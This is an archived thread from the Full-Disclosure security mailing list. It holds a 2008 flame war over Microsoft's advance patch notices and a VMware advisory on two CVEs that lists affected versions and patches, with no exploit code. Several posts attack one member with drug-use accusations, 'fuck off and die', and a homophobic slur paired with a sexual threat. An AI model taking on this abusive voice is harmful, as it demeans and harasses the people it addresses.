From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 16:09:55 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
	<4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
	<6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
	<4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
	<a741a45f0811062034u71746e8i354c0dfc673133d3@mail.gmail.com>
	<4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>
Message-ID: <a741a45f0811062109s4527045p5e87f0395ef12c6b@mail.gmail.com>

I could care less about metasploit, all it does is help the kiddies.. but
that doesnt mean it should be illegal. Software is knowledge and knowledge
should be free, but that is not the issue here. The issue is that you are a
bullshitting drug abuser who's child like demeanor wont allow him to even
acknowledge bad things written about him. You are performing the internet
equivalent of sticking your fingers in your ears and yelling "nana i cant
hear you" in an attempt to make the situation go away.

So you unknowledgable, untalented, unemployed junkie.. do you have anything
relevant to what I asked to contribute or are you going to just ignore it
like the pussy that you are?

Also, dont try and portray yourself like a free thinking martyr... your
opinions are just rehashed idea sparked off cnet news comments and various
other sources of "security information". Anyone who knows even the slightest
thing about information security knows you and your idealist views are a
joke.


On Fri, Nov 7, 2008 at 3:46 PM, n3td3v <xploitable at gmail.com> wrote:

> you seem like an hd moore/metasploit fan boy pissed off that i don't
> respect him or like his metasploit software. n3td3v doesn't respect
> people like the sheep do, i think for myself, have opinions about
> other white hats that may not be in support of them. get used to it
> bozo.
>
> On Fri, Nov 7, 2008 at 4:34 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> > Acting like the child that he is, n3td3v continues to ignore questions
> posed
> > to him. How can he be such an avid debater over the legality of things
> like
> > metasploit, 0day auctions and similarly themed bullshit threads when he
> > completely disregards drug laws? How do you intend to lobby people to
> listen
> > to you when you are not a law abiding citizen yourself? You have no
> > credibility in the eyes of the law, so don't psuedo threaten people
> trying
> > to appear like you have some government backing. You have proven beyond
> > doubt that you dont, because the government doesnt listen to drug taking
> > internet heroes, such as yourself.
> >
> > So enough with the bullshit.. FUCK OFF AND DIE.
> >
> >
> > On Fri, Nov 7, 2008 at 1:02 PM, n3td3v <xploitable at gmail.com> wrote:
> >>
> >> i'm sorry that you don't agree with my heads up theory, i stand by
> >> what i said however. i'm sure microsoft don't read full-disclosure
> >> anyway, so you're right i'm not going to change anything. by the way,
> >> i've noticed you haven't stopped stalking me yet, im a bit concerned
> >> about your health. cheers.
> >>
> >> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet <ureleet at gmail.com> wrote:
> >> > first off, u arent going to get any1 2 change anything. so, lets get
> >> > that out of the way right there.
> >> >
> >> > second of all, in order for u 2 prove ur point, id like 4 u to go to
> >> > some research of how many exploits have come out during the 5 day
> >> > period between vague-ass disclosure and patch publish.  then compare
> >> > and contrast that against how many exploits have come out in the 24
> >> > hours following the patch publish after people have had a chance to do
> >> > bindiffs (u know what that means right white-hat?) against the
> >> > patches.  then, take all that data, draw some charts and graphs, write
> >> > a whitepaper, and present it somewhere.
> >> >
> >> > u know what thats called?  research.  real ppl do it.
> >> >
> >> > u dont.  and that is why, u suck.  ta ta.
> >> >
> >> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v <xploitable at gmail.com> wrote:
> >> >> so you don't think its logical that these 5 day heads up could be
> >> >> helping the bad guys out? right. i think the world's biggest hackers
> >> >> could do a lot of research in 5 days. but then again n3td3v isn't
> >> >> logical so i must be wrong. damn those drugs eh? i just asked what
> the
> >> >> realistic possibility was for a 5 day turn around from the day of the
> >> >> heads up until a patch is released. i just thought it was bad that we
> >> >> were giving the bad guys a 5 day head start, but never mind n3td3v
> >> >> isn't logical so i must be wrong. scraping the 5 day head start isn't
> >> >> a good idea because n3td3v isn't logical? right, i threw away 10
> years
> >> >> of my life to not be logical...
> >> >>
> >> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad <
> waveroad at gmail.com>
> >> >> wrote:
> >> >>>
> >> >>> You can be ""monitoring"" the scene since 20 years if you want to,
> >> >>> it's not
> >> >>> for that your point will be valuable.
> >> >>> And actually it is not, also this is about logic.
> >> >>>
> >> >>> See you're wrong again.
> >> >>>
> >> >>> Get the fuck out of here.
> >> >>>
> >> >>>
> >> >>>
> >> >>>
> >> >>>
> >> >>>
> >> >>>
> >> >>>
> >> >>> 2008/11/6, n3td3v <xploitable at gmail.com>:
> >> >>>>
> >> >>>> i've been monitoring the scene since 1999 so what do you mean no
> >> >>>> experience? i make that about 10 years experience if my math is
> >> >>>> correct.
> >> >>>>
> >> >>>>
> >> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com>
> >> >>>> wrote:
> >> >>>> > Do you even understand why people dont like you? It is because
> you
> >> >>>> > have
> >> >>>> > all
> >> >>>> > these crackpot ideas but no experience to back it up. All your
> >> >>>> > ideas
> >> >>>> > only
> >> >>>> > make sense from a theoretical standpoint, but in practicality
> most
> >> >>>> > will
> >> >>>> > fail.
> >> >>>> >
> >> >>>>
> >> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com>
> >> >>>> > wrote:
> >> >>>> >>
> >> >>>> >> blackhats like you will always hate on me, so i just ignore the
> >> >>>> >> negative responses i get.
> >> >>>> >
> >> >>>>
> >> >>>>
> >> >>>> _______________________________________________
> >> >>>> Full-Disclosure - We believe in it.
> >> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> >>>> Hosted and sponsored by Secunia - http://secunia.com/
> >> >>>
> >> >>>
> >> >>> _______________________________________________
> >> >>> Full-Disclosure - We believe in it.
> >> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> >>> Hosted and sponsored by Secunia - http://secunia.com/
> >> >>>
> >> >>
> >> >> _______________________________________________
> >> >> Full-Disclosure - We believe in it.
> >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> >> Hosted and sponsored by Secunia - http://secunia.com/
> >> >>
> >> >
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/b8d3062b/attachment.html 

From xploitable at gmail.com  Fri Nov  7 05:31:42 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 05:31:42 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <a741a45f0811062109s4527045p5e87f0395ef12c6b@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
	<4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
	<6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
	<4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
	<a741a45f0811062034u71746e8i354c0dfc673133d3@mail.gmail.com>
	<4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>
	<a741a45f0811062109s4527045p5e87f0395ef12c6b@mail.gmail.com>
Message-ID: <4b6ee9310811062131h353b06f4g3ed55c80fadbaeee@mail.gmail.com>

why should i respond to your off-topic personal jabs? all it would do
is start a flame war and im not into that. im performing self control
and restraint by not responding to your personal jabs, nobody on the
list wants a flame war based on personal jabs, so im not going to feed
it. im reading everything you say, im not ignoring it. if you choose
to be against me and not with me is your choice that you make, there
is nothing else for me to add on the topic.

On Fri, Nov 7, 2008 at 5:09 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>
> I could care less about metasploit, all it does is help the kiddies.. but
> that doesnt mean it should be illegal. Software is knowledge and knowledge
> should be free, but that is not the issue here. The issue is that you are a
> bullshitting drug abuser who's child like demeanor wont allow him to even
> acknowledge bad things written about him. You are performing the internet
> equivalent of sticking your fingers in your ears and yelling "nana i cant
> hear you" in an attempt to make the situation go away.
>
> So you unknowledgable, untalented, unemployed junkie.. do you have anything
> relevant to what I asked to contribute or are you going to just ignore it
> like the pussy that you are?
>
> Also, dont try and portray yourself like a free thinking martyr... your
> opinions are just rehashed idea sparked off cnet news comments and various
> other sources of "security information". Anyone who knows even the slightest
> thing about information security knows you and your idealist views are a
> joke.
>
>
> On Fri, Nov 7, 2008 at 3:46 PM, n3td3v <xploitable at gmail.com> wrote:
>>
>> you seem like an hd moore/metasploit fan boy pissed off that i don't
>> respect him or like his metasploit software. n3td3v doesn't respect
>> people like the sheep do, i think for myself, have opinions about
>> other white hats that may not be in support of them. get used to it
>> bozo.
>>
>> On Fri, Nov 7, 2008 at 4:34 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>> > Acting like the child that he is, n3td3v continues to ignore questions
>> > posed
>> > to him. How can he be such an avid debater over the legality of things
>> > like
>> > metasploit, 0day auctions and similarly themed bullshit threads when he
>> > completely disregards drug laws? How do you intend to lobby people to
>> > listen
>> > to you when you are not a law abiding citizen yourself? You have no
>> > credibility in the eyes of the law, so don't psuedo threaten people
>> > trying
>> > to appear like you have some government backing. You have proven beyond
>> > doubt that you dont, because the government doesnt listen to drug taking
>> > internet heroes, such as yourself.
>> >
>> > So enough with the bullshit.. FUCK OFF AND DIE.
>> >
>> >
>> > On Fri, Nov 7, 2008 at 1:02 PM, n3td3v <xploitable at gmail.com> wrote:
>> >>
>> >> i'm sorry that you don't agree with my heads up theory, i stand by
>> >> what i said however. i'm sure microsoft don't read full-disclosure
>> >> anyway, so you're right i'm not going to change anything. by the way,
>> >> i've noticed you haven't stopped stalking me yet, im a bit concerned
>> >> about your health. cheers.
>> >>
>> >> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet <ureleet at gmail.com> wrote:
>> >> > first off, u arent going to get any1 2 change anything. so, lets get
>> >> > that out of the way right there.
>> >> >
>> >> > second of all, in order for u 2 prove ur point, id like 4 u to go to
>> >> > some research of how many exploits have come out during the 5 day
>> >> > period between vague-ass disclosure and patch publish.  then compare
>> >> > and contrast that against how many exploits have come out in the 24
>> >> > hours following the patch publish after people have had a chance to
>> >> > do
>> >> > bindiffs (u know what that means right white-hat?) against the
>> >> > patches.  then, take all that data, draw some charts and graphs,
>> >> > write
>> >> > a whitepaper, and present it somewhere.
>> >> >
>> >> > u know what thats called?  research.  real ppl do it.
>> >> >
>> >> > u dont.  and that is why, u suck.  ta ta.
>> >> >
>> >> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v <xploitable at gmail.com> wrote:
>> >> >> so you don't think its logical that these 5 day heads up could be
>> >> >> helping the bad guys out? right. i think the world's biggest hackers
>> >> >> could do a lot of research in 5 days. but then again n3td3v isn't
>> >> >> logical so i must be wrong. damn those drugs eh? i just asked what
>> >> >> the
>> >> >> realistic possibility was for a 5 day turn around from the day of
>> >> >> the
>> >> >> heads up until a patch is released. i just thought it was bad that
>> >> >> we
>> >> >> were giving the bad guys a 5 day head start, but never mind n3td3v
>> >> >> isn't logical so i must be wrong. scraping the 5 day head start
>> >> >> isn't
>> >> >> a good idea because n3td3v isn't logical? right, i threw away 10
>> >> >> years
>> >> >> of my life to not be logical...
>> >> >>
>> >> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad
>> >> >> <waveroad at gmail.com>
>> >> >> wrote:
>> >> >>>
>> >> >>> You can be ""monitoring"" the scene since 20 years if you want to,
>> >> >>> it's not
>> >> >>> for that your point will be valuable.
>> >> >>> And actually it is not, also this is about logic.
>> >> >>>
>> >> >>> See you're wrong again.
>> >> >>>
>> >> >>> Get the fuck out of here.
>> >> >>>
>> >> >>>
>> >> >>>
>> >> >>>
>> >> >>>
>> >> >>>
>> >> >>>
>> >> >>>
>> >> >>> 2008/11/6, n3td3v <xploitable at gmail.com>:
>> >> >>>>
>> >> >>>> i've been monitoring the scene since 1999 so what do you mean no
>> >> >>>> experience? i make that about 10 years experience if my math is
>> >> >>>> correct.
>> >> >>>>
>> >> >>>>
>> >> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com>
>> >> >>>> wrote:
>> >> >>>> > Do you even understand why people dont like you? It is because
>> >> >>>> > you
>> >> >>>> > have
>> >> >>>> > all
>> >> >>>> > these crackpot ideas but no experience to back it up. All your
>> >> >>>> > ideas
>> >> >>>> > only
>> >> >>>> > make sense from a theoretical standpoint, but in practicality
>> >> >>>> > most
>> >> >>>> > will
>> >> >>>> > fail.
>> >> >>>> >
>> >> >>>>
>> >> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com>
>> >> >>>> > wrote:
>> >> >>>> >>
>> >> >>>> >> blackhats like you will always hate on me, so i just ignore the
>> >> >>>> >> negative responses i get.
>> >> >>>> >
>> >> >>>>
>> >> >>>>
>> >> >>>> _______________________________________________
>> >> >>>> Full-Disclosure - We believe in it.
>> >> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> >>>> Hosted and sponsored by Secunia - http://secunia.com/
>> >> >>>
>> >> >>>
>> >> >>> _______________________________________________
>> >> >>> Full-Disclosure - We believe in it.
>> >> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> >>> Hosted and sponsored by Secunia - http://secunia.com/
>> >> >>>
>> >> >>
>> >> >> _______________________________________________
>> >> >> Full-Disclosure - We believe in it.
>> >> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >> >>
>> >> >
>> >>
>> >> _______________________________________________
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From security at vmware.com  Fri Nov  7 05:41:05 2008
From: security at vmware.com (VMware Security Team)
Date: Thu, 06 Nov 2008 21:41:05 -0800
Subject: [Full-disclosure] VMSA-2008-0018 VMware Hosted products and patches
 for ESX and ESXi resolve two security issues
Message-ID: <4913D4F1.80300@vmware.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2008-0018
Synopsis:          VMware Hosted products and patches for ESX and ESXi
                   resolve two security issues
Issue date:        2008-11-06
Updated on:        2008-11-06 (initial release of advisory)
CVE numbers:       CVE-2008-4915 CVE-2008-4281
- ------------------------------------------------------------------------

1. Summary

   VMware Hosted products and patches for ESX and ESXi resolve multiple
   security issues. A flaw in the CPU hardware emulation may allow for a
   privilege escalation on virtual machine guest operating systems. In
   addition a directory traversal issue is resolved.

2. Relevant releases

   VMware Workstation 6.0.5 and earlier,
   VMware Workstation 5.5.8 and earlier,
   VMware Player 2.0.5 and earlier,
   VMware Player 1.0.8 and earlier,
   VMware ACE 2.0.5 and earlier,
   VMware ACE 1.0.7 and earlier,
   VMware Server 1.0.7 and earlier.

   VMware ESXi 3.5 without patch ESXe350-200810401-O-UG

   VMware ESX 3.5 without patch ESX350-200810201-UG

   VMware ESX 3.0.3 without patch ESX303-200810501-BG
   VMware ESX 3.0.2 without patch ESX-1006680
   VMware ESX 2.5.5 without upgrade patch 10 or later
   VMware ESX 2.5.4 without upgrade patch 21

   NOTE: Hosted products VMware Workstation 5.x, VMware Player 1.x,
         and VMware ACE 1.x will reach end of general support
         2008-11-09. Customers should plan to upgrade to the latest
         version of their respective products.

         Extended support (Security and Bug fixes) for ESX 3.0.2 ended
         on 2008-10-29 and Extended support for ESX 3.0.2 Update 1
         ends on 2009-08-08.  Users should plan to upgrade to ESX 3.0.3
         and preferably to the newest release available.

3. Problem Description

 a. A privilege escalation on 32-bit and 64-bit guest operating systems

    VMware products emulate hardware functions and create the
    possibility to run guest operating systems.

    A flaw in the CPU hardware emulation might allow the virtual CPU to
    incorrectly handle the Trap flag. Exploitation of this flaw might
    lead to a privilege escalation on guest operating systems.  An
    attacker needs a user account on the guest operating system and
    have the ability to run applications.

    VMware would like to thank Derek Soeder for discovering
    this issue and working with us on its remediation.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-4915 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    Workstation    6.5.x     any      not affected
    Workstation    6.0.x     any      6.5.0 build 118166 or later
    Workstation    5.x       any      5.5.9 build 126128 or later

    Player         2.5.x     any      not affected
    Player         2.0.x     any      2.5.0 build 118166 or later
    Player         1.x       any      1.0.9 build 126128 or later

    ACE            2.5.x     Windows  not affected
    ACE            2.0.x     Windows  2.5.0 build 118166 or later
    ACE            1.x       Windows  1.0.8 build 125922 or later

    Server         2.x       any      not affected
    Server         1.x       any      1.0.8 build 126538 or later

    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X not affected

    ESXi           3.5       ESXi     ESXe350-200810401-O-UG

    ESX            3.5       ESX      ESX350-200810201-UG
    ESX            3.0.3     ESX      ESX303-200810501-BG
    ESX            3.0.2     ESX      ESX-1006680
    ESX            2.5.5     ESX      ESX 2.5.5 upgrade patch 10 or later
    ESX            2.5.4     ESX      ESX 2.5.4 upgrade patch 21

 b.  Directory traversal vulnerability
 
    VirtualCenter allows administrators to have fine-grained privileges.
    A directory traversal vulnerability might allow administrators to
    increase these privileges. In order to leverage this flaw, the
    administrator would need to have the Datastore.FileManagement
    privilege.

    VMware would like to thank Michel Toussaint for reporting this issue
    to us.
 
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-4281 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    hosted *       any       any      not affected

    ESXi           3.5       ESXi     ESXe350-200810401-O-UG

    ESX            3.5       ESX      ESX350-200810201-UG
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected
    ESX            2.5.4     ESX      not affected

    * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   VMware Workstation 5.5.9
   ------------------------
   http://www.vmware.com/download/ws/ws5.html
   Release notes:
   http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html

   Windows binary:
   md5sum: 509c7b323a8ac42c0a92b0a1446bb0f8

   Compressed Tar archive for 32-bit Linux
   md5sum: 9d189e72f8111e44b27f1ee92edf265e

   Linux RPM version for 32-bit Linux
   md5sum: 0957c5258d033d0107517df64bfea240


   VMware Player 1.0.9
   -----------------------------
   http://www.vmware.com/download/player/
   Release notes Player 1.x:
   http://www.vmware.com/support/player/doc/releasenotes_player.html

   Windows binary
   md5sum: e2c8dd7b27df7d348f14f69de017b93f

   Player 1.0.9 for Linux (.rpm)
   md5sum: 471c3881fa60b058b1dac1d3c9c32c85

   Player 1.0.9 for Linux (.tar)
   md5sum: bef507811698e7333f5e8cb672530dbf


   VMware ACE 1.0.8
   ----------------
   http://www.vmware.com/download/ace/
   Release notes:
   http://www.vmware.com/support/ace/doc/releasenotes_ace.html

   Windows binary
   md5sum: 920a08c2fcdeaedcb3258183817419a0

   ACE 1.0.8 for Linux (.rpm)
   md5sum: 450254b73fa6802713136bf2c04e5b40

   ACE 1.0.8 for Linux (.tar)
   md5sum: 5efdaccf8217b8d7875d3f35cd6159e0


   VMware Server 1.0.8
   -------------------
   http://www.vmware.com/download/server/
   Release notes:
   http://www.vmware.com/support/server/doc/releasenotes_server.html

   VMware Server for Windows 32-bit and 64-bit
   md5sum: 4ba41e5fa192f786121a7395ebaa8d7c

   VMware Server Windows client package
   md5sum: f25746e275ca00f28d44ad372fc92536

   VMware Server for Linux
   md5sum: a476d3953ab1ff8457735e692fa5edf9

   VMware Server for Linux rpm
   md5sum: af6890506618fa82928fbfba8a5f97e1

   Management Interface
   md5sum: 5982b84a39479cabce63e12ab664d369

   VMware Server Linux client package
   md5sum: 605d7db48f63211cc3f5ddb2b3f915a6


   ESXi
   ----
   ESXi 3.5 patch ESXe350-200810401-O-UG
   http://download3.vmware.com/software/vi/ESXe350-200810401-O-UG.zip
   md5sum: 9b83c54a005572bebb86652e3efd732a
   http://kb.vmware.com/kb/1007056

   NOTE: The three ESXi patches for Firmware "I", VMware Tools "T," and
         the VI Client "C" are contained in a single offline "O"
         download file.

   ESX
   ---
   ESX Server 3.5 update 3 CD image Refresh
   md5sum: e9bdaad2d37872820a4cad8e8dbde536
   http://www.vmware.com/download/download.do?downloadGroup=ESX350U3

   ESX Server 3.5 upgrade package from ESX Server 2.x to ESX Server 3.5
Update 3 Refresh
   md5sum:2da08fed15bd4b1ed5b19433e837591c
   http://www.vmware.com/download/download.do?downloadGroup=ESX350U3

   ESX Server 3.5 upgrade package from ESX Server 3.0.x to ESX Server 3.5
Update 3 Refresh
   md5sum:d631aa8418d99fce4280fc3905ac4c37
   http://www.vmware.com/download/download.do?downloadGroup=ESX350U3

   ESX Server 3.5 upgrade package from ESX Server 3.5 to ESX Server 3.5
Update 3 Refresh
   md5sum:4dea5d943d0c0469c397b6520dfeb0fb
   http://www.vmware.com/download/download.do?downloadGroup=ESX350U3

   ESX 3.5 patch ESX350-200810201-UG (vCPU/directory traversal)
   http://download3.vmware.com/software/vi/ESX350-200810201-UG.zip
   md5sum: 6f26f985d9fea520ebdda7c65b60486e
   http://kb.vmware.com/kb/1007041

   ESX 3.0.3 patch ESX303-200810501-BG (vCPU)
   http://download3.vmware.com/software/vi/ESX303-200810501-BG.zip
   md5sum: da72f475c5ac038379d712d36307e33d
   http://kb.vmware.com/kb/1006969

   ESX 3.0.2 patch ESX-1006680 (vCPU)
   http://download3.vmware.com/software/vi/ESX-1006680.tgz
   md5sum: 8186a2e77bc7c0e4cd5b214d0a5d29c0
   http://kb.vmware.com/kb/1006680

   VMware ESX 2.5.5 Upgrade Patch 10
   http://download3.vmware.com/software/esx/esx-2.5.5-119702-upgrade.tar.gz
   md5sum: 2ee87cdd70b1ba84751e24c0bd8b4621
   http://vmware.com/support/esx25/doc/esx-255-200810-patch.html

   VMware ESX 2.5.4 Upgrade Patch 21
   http://download3.vmware.com/software/esx/esx-2.5.4-119703-upgrade.tar.gz
   md5sum: d791be525c604c852a03dd7df0eabf35
   http://vmware.com/support/esx25/doc/esx-254-200810-patch.html

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4915
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4281

- ------------------------------------------------------------------------
6. Change log

2008-11-06  VMSA-2008-0018
Initial security advisory after release of VMware Workstation, VMware
Player, VMware ACE, VMware Server and ESXi and ESX 3.5 Update 3
on 2008-11-06.

- -----------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2008 VMware Inc.  All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8

wj8DBQFJE9TRS2KysvBH1xkRArqUAJ9lo3j0TD709+27HlDCa7E8igu+AgCfZTTC
O60MAdvOuLJHSO8DOJ7SLx8=
=BOi5
-----END PGP SIGNATURE-----



From biz.marqee at gmail.com  Fri Nov  7 05:51:57 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 16:51:57 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811062131h353b06f4g3ed55c80fadbaeee@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
	<4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
	<6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
	<4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
	<a741a45f0811062034u71746e8i354c0dfc673133d3@mail.gmail.com>
	<4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>
	<a741a45f0811062109s4527045p5e87f0395ef12c6b@mail.gmail.com>
	<4b6ee9310811062131h353b06f4g3ed55c80fadbaeee@mail.gmail.com>
Message-ID: <a741a45f0811062151o6c80cad7q872de478a4ea0b7c@mail.gmail.com>

Nobody on the list wants YOU so I don't see how you can justify what people
want to see as your argument for not retaliating.

Ill fuck you 'til you love me, faggot.


On Fri, Nov 7, 2008 at 4:31 PM, n3td3v <xploitable at gmail.com> wrote:

> why should i respond to your off-topic personal jabs? all it would do
> is start a flame war and im not into that. im performing self control
> and restraint by not responding to your personal jabs, nobody on the
> list wants a flame war based on personal jabs, so im not going to feed
> it. im reading everything you say, im not ignoring it. if you choose
> to be against me and not with me is your choice that you make, there
> is nothing else for me to add on the topic.
>
> On Fri, Nov 7, 2008 at 5:09 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> >
> > I could care less about metasploit, all it does is help the kiddies.. but
> > that doesnt mean it should be illegal. Software is knowledge and
> knowledge
> > should be free, but that is not the issue here. The issue is that you are
> a
> > bullshitting drug abuser who's child like demeanor wont allow him to even
> > acknowledge bad things written about him. You are performing the internet
> > equivalent of sticking your fingers in your ears and yelling "nana i cant
> > hear you" in an attempt to make the situation go away.
> >
> > So you unknowledgable, untalented, unemployed junkie.. do you have
> anything
> > relevant to what I asked to contribute or are you going to just ignore it
> > like the pussy that you are?
> >
> > Also, dont try and portray yourself like a free thinking martyr... your
> > opinions are just rehashed idea sparked off cnet news comments and
> various
> > other sources of "security information". Anyone who knows even the
> slightest
> > thing about information security knows you and your idealist views are a
> > joke.
> >
> >
> > On Fri, Nov 7, 2008 at 3:46 PM, n3td3v <xploitable at gmail.com> wrote:
> >>
> >> you seem like an hd moore/metasploit fan boy pissed off that i don't
> >> respect him or like his metasploit software. n3td3v doesn't respect
> >> people like the sheep do, i think for myself, have opinions about
> >> other white hats that may not be in support of them. get used to it
> >> bozo.
> >>
> >> On Fri, Nov 7, 2008 at 4:34 AM, Biz Marqee <biz.marqee at gmail.com>
> wrote:
> >> > Acting like the child that he is, n3td3v continues to ignore questions
> >> > posed
> >> > to him. How can he be such an avid debater over the legality of things
> >> > like
> >> > metasploit, 0day auctions and similarly themed bullshit threads when
> he
> >> > completely disregards drug laws? How do you intend to lobby people to
> >> > listen
> >> > to you when you are not a law abiding citizen yourself? You have no
> >> > credibility in the eyes of the law, so don't psuedo threaten people
> >> > trying
> >> > to appear like you have some government backing. You have proven
> beyond
> >> > doubt that you dont, because the government doesnt listen to drug
> taking
> >> > internet heroes, such as yourself.
> >> >
> >> > So enough with the bullshit.. FUCK OFF AND DIE.
> >> >
> >> >
> >> > On Fri, Nov 7, 2008 at 1:02 PM, n3td3v <xploitable at gmail.com> wrote:
> >> >>
> >> >> i'm sorry that you don't agree with my heads up theory, i stand by
> >> >> what i said however. i'm sure microsoft don't read full-disclosure
> >> >> anyway, so you're right i'm not going to change anything. by the way,
> >> >> i've noticed you haven't stopped stalking me yet, im a bit concerned
> >> >> about your health. cheers.
> >> >>
> >> >> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet <ureleet at gmail.com> wrote:
> >> >> > first off, u arent going to get any1 2 change anything. so, lets
> get
> >> >> > that out of the way right there.
> >> >> >
> >> >> > second of all, in order for u 2 prove ur point, id like 4 u to go
> to
> >> >> > some research of how many exploits have come out during the 5 day
> >> >> > period between vague-ass disclosure and patch publish.  then
> compare
> >> >> > and contrast that against how many exploits have come out in the 24
> >> >> > hours following the patch publish after people have had a chance to
> >> >> > do
> >> >> > bindiffs (u know what that means right white-hat?) against the
